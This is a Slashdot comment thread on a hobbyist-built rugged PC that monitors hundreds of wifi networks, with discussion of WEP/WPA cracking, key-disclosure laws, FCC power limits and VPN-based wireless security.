Hacker-Built PC Scans 300 Wifi Networks At Once 121
An anonymous reader writes to mention an Engadget post on an incredibly powerful wifi scanner. The 'Janus Project', as it is called, can sniff 300 networks simultaneously. It stores and encrypts the data as it receives it, for later use. From the article: "In addition, the Janus Project has an instant off switch, which requires a USB key that has a 2000-bit passkey and a separate password to regain access. What's under the hood? Williams packed an Ubuntu Linux machine running on a 1.5GHz VIA C7 processor with an Acer 17-inch screen into that snazzy little rugged yellow box. Oh, and the closed case is waterproof too, in case you need to transport Janus Project on a whitewater raft to your next hacking hotspot. We don't doubt someone will." The post leads to a tgdaily article, which offers more details.
Just another way to get thrown into Gitmo. (Score:3, Funny)
Re: (Score:2, Informative)
After the Instant Off switch is hit, a USB key with a 2000-bit passkey and a manually entered password are needed to access the computer. Williams said that even if someone managed to grab the USB key, they would still have to "torture or bribe me" to get the password.
In the UK, the RIP act allows you to be thrown in jail for 3 years for not supplying the encryption keys, in America I can quite easily picture this guy wearing his leather hat and some fetching oran
Re: (Score:1)
Re: (Score:3, Interesting)
Your three choices are:
1) answer the questions/comply with information requests - which ends up incriminating you
2) refuse to answer the questions - now you can be charged with interfering
Re: (Score:2)
Of course, be ready to face the full force of the authorities' revenge for daring to stand up to them when they do something wrong.
Re: (Score:2)
Law-enforcement isn't your only adversary. It's just a good one to model because it's an adversary with lots of resources at its disposal, and not necessarily completely trustworthy.
No information technology is going to give you significant protection from the courts except in very limited circumstances.
Just about time (Score:2)
Re: (Score:2)
Re: (Score:2)
I don't think that this machine can scan, decrypt, and record 300 WiFi Networks in real-time.
Re:Just about time (Score:5, Interesting)
No, it can't decrypt traffic from 300 networks at once, but it can certainly crack one that's encrypted with some of the most common algorithms rather quickly. It's more than just a recording device. Although, if it really can crack networks that quickly, then concievably you could crack all the WEP-enabled networks in range, and then start logging all the traffic on all the networks that you could hear, encrypted and not, for later analysis.
Re: (Score:2)
Oh come on... That just makes him sound like a nutcase.
Re: (Score:1)
Re: (Score:1)
Re: (Score:2, Informative)
Re: (Score:2)
Oh, nifty! I guess it replays recorded (encrypted) frames, hoping to capture the replies (even if they're just NAKs) in order to use them to get the IVs needed to crack the WEP key.
Yet another reason why encryption without authentication (or doing something with messages that have failed authentication besides dropping them to the floor) is a bad idea.
Re: (Score:2)
Re: (Score:2)
Already a common feature (Score:5, Funny)
I use a hammer, you use an instant-off switch that you'll never be able to turn back on. At the end of the day, at least one of us will have released some pent-up frustration and anger.
What kind of hammer? (Score:3, Funny)
(OMG - and you thought Geek sites were bad - "hammernet". Sheesh!)
Re: (Score:3, Funny)
Re: (Score:1)
This device is against FCC Part 15 rules (Score:5, Interesting)
I know everyone on
to hack some schmuck's WEP key.
Re:This device is against FCC Part 15 rules (Score:5, Insightful)
-b
Re: (Score:2)
Re:This device is against FCC Part 15 rules (Score:5, Insightful)
The FCC regulating whether or not i can say FUCK on the radio, I don't.
Re: (Score:1)
Re:This device is against FCC Part 15 rules (Score:4, Insightful)
"I like the way the rules help me in one way, I don't like the way the rules constrain me in another way."
At some point, the organism understands that society - the collective "we" that live together - cannot exist without compromise, and the essence of compromise is empathy.
Perhaps you might consider that some of us would prefer that you pollute your own yard, not the collective commons that is the public airwaves.
Re: (Score:2)
Maybe his particular statement, but I will come to his defense.
Well in one instance the rules are forcing devices to not interfere with eachother, a fairly useful form of government regulation. In the other case the regulation puts a constraint on the First Amendment ("Congress shall make now law [...] abridging the freedom of speech"), an illegal
Re: (Score:2)
What?! (Score:2)
Go back to church and don't hurt yourself by attempting to think. Leave that to us science and nerd types, please.
rhY
Re: (Score:2)
Let's go back to the topic, perhaps?
So you claim that the right to say "FUCK" is established in the Bill of Rights. So by your logic, I can say FUCK wherever I want? Oh wait, no, I can't. Dozens of court cases (many going all the way to the Supreme
Re: (Score:2)
The one watt amplifiers mentioned in the article almost guarantees that this device is operating outside the FCC part 15 rules.
False.
802.11 is considered to be direct sequence spread-spectrum. According to 47 CFR 15.247(b)(3), the limit is 1W for this purpose.
Re: (Score:1)
Re: (Score:2)
I'm not denying that 1 Watt amplifiers are totally leagal, but doesn't that imply that the antenna is going to be low-gain in order to meet the field strength limits?
As a DSSS system, 802.11 is regulated on a power/gain rather than field strength basis. You can have up to a 6dB antenna gain before you have to start peeling back you transmitter power to comply.
From there, if you have a point-to-multipoint system (which is what this box would be), you need to drop back dB-for-dB for every dB over 6. F
Re: (Score:1)
Sell? (Score:3, Interesting)
I'm sorry, but I don't see much in the way of commercial application for this thing - we know standard wireless networking encryption isn't secure. We know it can be cracked, and it can be cracked with just 2 cheap laptops to capture the data. There isn't much more of a need for proof-of-concept anymore.
Re: (Score:2)
Re: (Score:1)
And I would pay for his hat.
Re: (Score:2)
Oh, not so sure about the military, but you know the FBI / NSA / CIA have them - BUT I bet they are not cheaper. EVERYTHING the government does costs more. After all, it's not like they guys buying shit are using their own money now... Network General has been making network sniffers for years, but their $20K boxes really don't do much more than a cheap laptop running ethereal(wireshark) and other misc open source tools.
Re: (Score:1)
*ducks
WEP is going to be ... (Score:1)
Why? Because of WEP 's broadcasting nature smart people make things like Janus Project and capture your data and may break WEP security.
This is known to cyptanalysts long before so it is superseeded by WPA(Wi-Fi Protected Access) and WPA2 standards.
But yes WEP is stil used to avoid casual snooping :).
:o\ (Score:5, Insightful)
I imagine that'd be a bit more productive.
I wish them good luck! (Score:5, Funny)
Re: (Score:2, Funny)
move.l <key>,d0
That was easy.
I'm not sure it's possible in x86 processors though.
How...? (Score:1)
Re: (Score:2)
But considering how mangled that sentence is, theoretically, I'd wait for a claim directly from the source before claiming crackpot.
Also in the next version (Score:3, Funny)
Re:Also in the next version (Score:5, Funny)
The Easter Bunny would just melt into a chocately mess.
Why? (Score:1)
He can already crack WEP in under five minutes, I could see where he could possibly crack WEP in a single "for" loop or something using recursion (in which case why would it need to loop? Maybe if something goes wrong, the router doesn't respond or something).
And then SHA1 and RSA encryption would be his next target, and eventually he'd get it to where he can crack that in a single "for" loop.
Re: (Score:2)
Re: (Score:1)
1. Read. 2. Write reply. 3. Re-read. 4. Post.
Re: (Score:1)
5. ???
6. Profit!
Re: (Score:1)
Re: (Score:2)
Usually, but not in VHDL.
Re: (Score:3, Informative)
Re: (Score:2)
RISC is so passe nowadays.
So use VPNs. (Score:5, Interesting)
Obvoiusly not foolproof. I need to get all the machines to drop the traffic unless it's routed through the router. In other words, it doesn't matter where it comes from, but the machines will only listen to traffic coming in off the VPN subnet, and then only listen to that if it's being routed by the internal router. That keeps someone from being cute somehow and confusing the network by plugging something in with an IP address that's on the VPN subnet; since it wouldn't come via the internal router (VPN server), the machines would go "Uh, WTF?"
Re: (Score:2)
You'd think by now that people would go ahead and use WEP or WPA, but tunnel traffic over a VPN even to internal sites. That's what I do. While someone may be able to crack my WEP or WPA keys, all that gets them is the ability to access the VPN port on the router.
That is because you truly take wireless security seriously where as 97% of the people do not. This is the ONLY proven way to secure wireless short of unpluging it. In such cases like this, all a hacker could do is DoS you, which is minor.
Re: (Score:2)
Silly me! I thought one-time pads were the only proven way to secure a wireless network. :P
Re: (Score:3, Informative)
I don't even bother with WEP/WPA (Score:2)
Some corrections (Score:5, Informative)
The disk encryption keys are stored on USB and decrypted via passphrase (key encryption key) using a custom init process that mounts the encrypted loop-aes disk(s) and does the pivot_root / exec init into the target. This gives you full disk encryption booting from a trusted read-only kernel+initrd iso image. (or hdd bootloader)
The "instant off" is the key zeroisation mechanism where loop-aes keys (rotated in memory) are flushed and the disks are now inaccesible. A reboot and passphrase auth with USB key device present is then required to get back to a working state.
The use of 8 radios means most of them are in monitor mode attached to different antennas. There are two amplified cards (1W teletronics in line) which can be used for injection / active attacks, but 2 transmitting radios is about the limit practically speaking due to 802.11MAC / CSCA.
The WPA/WPA2 cracking references WPA-PSK dictionary attacks / cowpatty speedup via the Padlock hash engine SHA1 instruction. This gives you about a 10-20x increase in dictionary attack throughput but is still slow compared to most attacks. Many other kernel functions (loop-aes, IPsec, entropy in
[The "breaking SHA1 and RSA encryption in a single processor instruction cycle" line appears to confuse the implementation of these primitives (SHA1/MontMult) in a single instruction. These are not cracked by a single instruction.]
The comment about government sales is likely due to the fact that this system is well over FCC EIRP limits, thus restricting commercial sales to military or emergency services.
Additional images here:
http://s103.photobucket.com/albums/m127/coderman4
http://s103.photobucket.com/albums/m127/coderman4
Re: (Score:1)
Re: (Score:2)
guess again...
Why modded overrated? (Score:3, Insightful)
I don't see how that post could be modded overrated. If I get modded troll and otherwise ignored...
Re:Why the confusion? (Score:2)
or perhaps this is all an elaborate rouse designed to make you think in that direction...
Re: (Score:2)
Accidental sterilization due to prolonged RF absorbtion is a serious problem. Also, a bottle of excedrin helps keep the microwave headaches at bay...
[but seriously, use a properly keyed VPN over wireless and you're in good shape against any attacker.]
Article Summary (Score:1, Insightful)
I already did this (Score:1)
Snazzy little yellow box? (Score:3, Informative)
Re: (Score:1)
You must be some kind of terrorist with all these snazzy little yellow boxes.
Re: (Score:2)
Simpler version scans almost as many (Score:2, Insightful)
Re: (Score:1)
283 * 0 = 0 (Score:4, Interesting)
Re: (Score:2)
Re: (Score:3, Informative)
1, 6, 11.
Any other channels are just varying degrees of overlap with these 3.
Re: (Score:2)
Maybe if you're between 2 APs separated by more than their transmit radius, but less than double it, you'll get both "sharing" a single channel, because they each can't sense the other to switch. But that'll make your own node unable to arb
Re: (Score:2)
Original Post (Score:1, Redundant)
Re: (Score:1, Redundant)
Re:love the picture in the tgdaily article (Score:5, Funny)
I've told you before, we don't want to hear about the herpes clinic.
300 networks? (Score:2)
K9 version (Score:1)
Start your engines. (Score:1)
Interesting (Score:2)
I employ two of three possible methods to secure my network, MAC filters and WPA keys. So I was thinking, how does this deal with MAC filters. Then it came to me that the first two octets of the MAC are easy - Intel has a pretty big lock on wireless, as does Broadcom. So that's 65,535 fewer combinations to look for. But where it gets interesting is in the last four octets. That leaves 4,294,967,296 possible combinations. Not that you couldn't brute
Re: (Score:2)
Referencing Judge Dredd is not funny (Score:2)
Re: (Score:2)
Re: (Score:2)
When they trace the VoIP calls back to your network, just tell the cops; "Um, yeah, I saw those guys leave, just as I as pulling up. They were using my secured network without my permission, then they entered my secure house and took my snacks from my child-proof cabinet. Then drove off in my locked car, carrying my secured weapons safe..."
Just add network access to the list of "secured" items that can be taken.
Re: (Score:1)
There you have it. Even a less-savvy judge will be convinced that it is possible and feasible, if there are tools like that mainstream.